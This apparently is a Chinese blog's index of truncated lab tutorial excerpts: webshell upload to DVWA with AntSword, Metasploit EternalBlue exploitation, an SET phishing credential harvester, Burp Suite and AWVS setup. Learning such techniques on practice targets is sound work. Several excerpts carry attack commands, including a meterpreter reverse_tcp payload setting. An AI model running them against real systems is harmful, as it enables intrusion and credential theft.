Z_l123的博客

1.编写一句话木马，并命名为muma.php2．利用靶机的文件上传漏洞，将此木马文件（ Webshell )上传至靶机1）打开dvwa网站2）成功登录DVWA网站后，在网站主页左侧菜单选择 DVWA Security，将网站的安全级别设置为"Low":3）在 DVWA网站主页左侧菜单选择"File upload"进入文件上传训练关卡，将muma.php上传至靶机，并记下文件上传的路径:3．利用"中国蚁剑"连接靶机上的 muma.php1）打开中国蚁剑2）在

1.登录到awvs2.设置扫描目标并执行扫描任务3.所有选项保持默认即可，点击扫描4.查看扫描结果

假设已知靶机存在ms17-010漏洞，在 Metasploit终端分别输入以下命令，利用ms17-010漏洞对靶机进行溢出攻击:use 3 //使用ms17_010_eternalblue模块show options //查看该模块需要哪些参数set rhosts 靶机ip //设置目标ip地址set lhost 操作机ip // 设置本地ip地址set payload windows/x64/meterpreter/reverse_tcp //使用pay

1.在kali中启动setoolkitsetoolkit2.利用SET构建钓鱼网站1）选择1 Social-Engineering Attacks （社会工程学攻击）2）选择2Website Attack Vectors （网站攻击流量）3）选择3Credential Harvester Attack Method （凭证收集攻击方法）4）选择1Web Templates （网站模板）5）输入操作机ip，作为钓鱼网站（凭证收集器...

工具phpstudy2018靶场平台 DWVA SQL步骤1.运行phpstudy并打开phpstudy网站根目录2.将下载好的靶场平台安装包放进去并解压3.DWVA：dvwa>config>config.inc.php.dist修改为下图，保存后将文件名config.inc.php.dist改为config.inc.php4.火狐访问http://127.0.0.1/dvwa5.在phpstudy中其他选项菜单>PH..

1.打开Burpsuite工具2.设置代理3.打开火狐>设置常规>网络设置>设置4.开始抓包（http）5.访问www.zhiyin.cn6.访问www.baidu.com（https）1.下载证书，访问127.0.0.1:9999，点击下载2.导入证书在 证书颁发机构 中导入刚才下载的证书，信任设置选择标识网站3.访问www.baidu.com...

操作机：kali靶机：windows 7永恒之蓝1.打开kali，进入终端界面2.启动Metasploitmsfdb init && msfconsole3.检测靶机是否存在ms12-020漏洞1）输入以下命令查找ms12-020相关模块search ms12-0202)使用ms12_020_check模块对目标进行漏洞检测use 1 //使用ms12_020_check模块show options .